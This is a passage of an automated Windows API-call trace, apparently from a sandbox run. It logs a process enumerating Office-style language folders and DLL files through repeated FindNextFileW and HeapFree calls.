ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1050", cAlternateFileName="")) returned 1 [0066.799] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.800] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x303975a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x303975a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x303975a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1051", cAlternateFileName="")) returned 1 [0066.800] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.800] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6bd3439, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6bd3439, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6bd3439, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1053", cAlternateFileName="")) returned 1 [0066.800] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.800] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf443017d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf443017d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf443017d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1054", cAlternateFileName="")) returned 1 [0066.801] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.801] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0089415, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0089415, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1055", cAlternateFileName="")) returned 1 [0066.801] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.801] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa8eba59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1057", cAlternateFileName="")) returned 1 [0066.801] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.801] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a046b0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1a046b0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1a046b0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1058", cAlternateFileName="")) returned 1 [0066.802] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.802] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99b89f6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99b89f6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99b89f6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1060", cAlternateFileName="")) returned 1 [0066.803] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.803] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc2d943c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2d943c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2d943c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1061", cAlternateFileName="")) returned 1 [0066.803] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.803] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1992fb3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992fb3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1992fb3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1062", cAlternateFileName="")) returned 1 [0066.803] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.803] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1063", cAlternateFileName="")) returned 1 [0066.804] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.804] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf80d6078, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80d6078, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80d6078, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1066", cAlternateFileName="")) returned 1 [0066.806] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.806] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffe01c35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffe01c35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffe01c35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1069", cAlternateFileName="")) returned 1 [0066.812] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.812] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5afc9d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5afc9d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5afc9d3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1081", cAlternateFileName="")) returned 1 [0066.812] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.812] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a2268a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7abb0bc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7abb0bc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1086", cAlternateFileName="")) returned 1 [0066.812] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.812] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6355df6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6355df6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6355df6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1087", cAlternateFileName="")) returned 1 [0066.817] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.817] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf61fd8b4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf61fd8b4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf61fd8b4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1110", cAlternateFileName="")) returned 1 [0066.823] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.823] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc47ce76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc47ce76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc47ce76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="2052", cAlternateFileName="")) returned 1 [0066.823] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.823] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c40a24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1c40a24, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1c40a24, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="2070", cAlternateFileName="")) returned 1 [0066.823] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.823] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf17ee5c3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf17ee5c3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="2074", cAlternateFileName="")) returned 1 [0066.824] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.824] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="3082", cAlternateFileName="")) returned 1 [0066.824] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.824] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67ce4b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67ce4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67ce4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="9242", cAlternateFileName="")) returned 1 [0066.824] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0066.824] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67ce4b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67ce4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67ce4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="9242", cAlternateFileName="")) returned 0 [0066.824] FindClose (in: hFindFile=0x4260748 | out: hFindFile=0x4260748) returned 1 [0066.824] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.824] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro", cAlternateFileName="")) returned 1 [0066.826] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.826] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru", cAlternateFileName="")) returned 1 [0066.828] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.828] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff580e7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk", cAlternateFileName="")) returned 1 [0066.830] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.830] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe99511, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl", cAlternateFileName="")) returned 1 [0066.832] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.832] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5612cee, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5612cee, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5612cee, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ae38, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0066.834] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.834] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-latn", cAlternateFileName="")) returned 1 [0066.836] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.836] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0066.838] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.838] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf02eb98a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv", cAlternateFileName="")) returned 1 [0066.840] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0066.840] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefebf763, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="th", cAlternateFileName="")) returned 1 [0067.849] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0067.849] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c40a24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16867e02, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16867e02, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr", cAlternateFileName="")) returned 1 [0067.851] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0067.851] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16841bb6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f913, dwReserved0=0x0, dwReserved1=0x0, cFileName="tracedefinition110.xml", cAlternateFileName="TRACED~1.XML")) returned 1 [0067.853] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0067.853] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf164abda, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vi", cAlternateFileName="")) returned 1 [0067.855] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0067.855] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefebf763, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHS", cAlternateFileName="")) returned 1 [0067.857] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0067.857] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHT", cAlternateFileName="")) returned 1 [0067.859] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0067.859] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHT", cAlternateFileName="")) returned 0 [0067.859] FindClose (in: hFindFile=0x4260608 | out: hFindFile=0x4260608) returned 1 [0067.859] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0067.860] FindNextFileW (in: hFindFile=0x4260648, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc7c5a96a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc7c5a96a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9d4a250, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x163c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="UmOutlookAddin.dll", cAlternateFileName="UMOUTL~1.DLL")) returned 1 [0067.861] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43910d8 | out: hHeap=0x5d0000) returned 1 [0067.861] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1b81e2e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1b680, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="AdeModule.dll", cAlternateFileName="ADEMOD~1.DLL")) returned 1 [0067.864] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: 